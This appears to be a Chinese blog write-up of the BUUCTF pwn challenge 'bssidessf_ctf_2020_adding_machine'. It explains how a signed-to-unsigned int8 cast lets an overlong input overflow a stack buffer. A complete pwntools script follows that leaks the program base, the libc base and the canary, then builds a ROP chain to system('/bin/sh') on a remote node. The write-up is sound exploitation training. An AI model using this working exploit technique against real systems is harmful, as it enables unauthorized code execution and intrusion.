[BUUCTF-pwn] bssidessf_ctf_2020_adding_machine

难度不大,要求输入n个数,但栈空间只能放127个数,要求输入数<127但可以输入负数,其它地址在输入debug时可以全部得到。

这里由于没有中途退出机制,需要精确的输入一个负数表示执行次数

  v6 = get_long("Number of numbers to add");
  if ( v6 <= 127 )
  {
    get_data(v8, (unsigned __int8)v6);          // 输入负数里,在这里用int8转成正数
    v7 = add_nums(v8, (unsigned __int8)v6);
    printf("Total is %ld\n", v7);
    result = 0;
  }

负数表示的次数为 n-256 这里需要输入133个,输入数字为133-256=-123

然后输入padding,canary,rbp,pop_rdi+1,pop_rdi,bin_sh,system

from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'

def connect():
    global p,libc_elf,one,libc_start_main_ret,local
    
    local = 0
    if local == 1:
        p = process('./pwn')
        libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
        one = [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]
        libc_start_main_ret = 0x21a87
    else:
        p = remote('node4.buuoj.cn', 28595) 
        libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
        one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
        libc_start_main_ret = 0x21b97

def pwn():

    p.sendlineafter(b'Number of numbers to add> ', '-123')
    p.sendlineafter(b'> ', b'debug')
    p.recvuntil(b'@ ')
    pwn_base = int(p.recvline(), 16) - elf.sym['main']
    p.recvuntil(b'@ ')
    libc_base = int(p.recvline(), 16) - libc_elf.sym['printf']
    p.recvuntil(b'RBP is ')
    rbp_addr  = int(p.recvline(), 16)
    canary_addr = hex(rbp_addr -0x10).encode()
    
    while True:
        v = p.readline()
        if canary_addr in v:
            canary = u64(bytes.fromhex((v[42:65].replace(b' ',b'')).decode() ))
            print('canary:', hex(canary))
            break
    
    print(hex(pwn_base), hex(libc_base), hex(canary))
    libc_elf.address = libc_base
    pop_rdi = next(libc_elf.search(asm('pop rdi; ret')))
    bin_sh  = next(libc_elf.search(b'/bin/sh'))
    system  = libc_elf.sym['system']
    
    for i in range(127):
        p.sendlineafter(b'> ', b'0')
    
    p.sendlineafter(b'> ', str(canary).encode())
    p.sendlineafter(b'> ', b'0')
    p.sendlineafter(b'> ', str(pop_rdi+1).encode())
    p.sendlineafter(b'> ', str(pop_rdi).encode())
    p.sendlineafter(b'> ', str(bin_sh).encode())
    p.sendlineafter(b'> ', str(system).encode())
    #p.sendlineafter(b'> ', b'0')
    
    p.sendlineafter(b'\n', b'cat /flag')
    p.interactive()

connect()
pwn()

上一篇:2022/1/29周末培训小结(hgame)


下一篇:【C++】第三节——引用详解